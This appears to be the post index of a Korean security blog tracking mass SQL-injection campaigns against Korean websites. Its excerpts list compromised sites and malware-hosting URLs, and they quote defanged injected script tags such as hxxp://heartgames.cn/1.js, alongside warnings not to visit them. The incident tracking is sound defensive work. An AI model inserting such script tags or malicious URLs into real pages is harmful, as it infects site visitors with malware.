헐랭이와 IT보안 (opt9's IT Security)

해외 보안 업체인 WebSense 의 신규 악성 코드 분석 보고 제목 : Malware & MySQL - Believe it! http://securitylabs.websense.com/content/Blogs/3099.aspx 악성코드가 중앙 DB 를 통해 다양한 공격 패턴을 다운로드 받는 방식. DB 에서는 당연히 감염 현황에 ...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.hxxp://www.chliyi.com/m.js 로 삽입.이번 공격의 피해 대상 사이트로는 부동산써브, MBC프로덕션, 보안뉴스 등이 있습니다.보안뉴스는 국내 사이트 해킹 피해를 다른 매체에 비해 비교적 적극적으로 ...

AVG 7.5 에서 McAfee AvertLab 블로그를 악성코드로 진단하는 사례AvertLab 블로그에 올라온 Mass SQL injection 코드 예제로 인해 탐지된 것임.사람 입장에선 명백한 False-Positive 인데, 기술적인 측면에서 보자면 정확히 잘 탐지해낸 것임.따라서, 기존의 탐지 패턴 수정 불필요함.이글루스 가든 - profess...

이번 공격에 엠파스쪽 CP 가 당한 모양.http://pcaccent.oranc.co.kr/tt/1096부동산써브(http://www.serve.co.kr/branch/)가 당하면서 그 내용이 그대로 올라온 것인 듯.흥미로운 점은 네이버, 다음, 네이트, 파란, 엠파스에 부동산 정보를 제공하는 원룸텔 역시 이 공격에 당했다는 점.CP ...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. 귀차니즘에 URL 만 정리 hxxp://www.adword71.com/b.js hxxp://klfyold.3322.org/wm/vip.js (접속 안됨) hxxp://s.see9.us/s.js hx...

direct84.com 삽입 공격이 다른 공격과 성격이 달랐던 건, VIP 가 아닌 다른 툴에 의해 공격이 이루어졌기 때문인 듯. 공격툴 분석 : http://www.secureworks.com/research/threats/danmecasprox/ 정리해보면 1. 봇넷 사업자가 중국쪽 공격 기법을 그대로 흡수해서 사용함 (구글 검색 -&g...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://heartgames.cn/1.js></script> 삽입하는 사례 Googling: 12 개, KR 도메인: 0개, 미차단 heartgames.c...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. hxxp://www1.xise.cn/tian.js -> tian.htm tian.htm -> hxxp://www.xise.cn/guanggao/taiji.htm   &nbs...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://sb.5252.ws:88/107/1.js></script> Googling: 40,400 개 KR 도메인: 0 개 미차단 1.js -> hx...

# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. <script src=hxxp://www.killwow1.cn/g.js></script> 삽입 사례 등장 Googling: 40 개, KR 도메인: 2 개, 미차단 g.js -&g...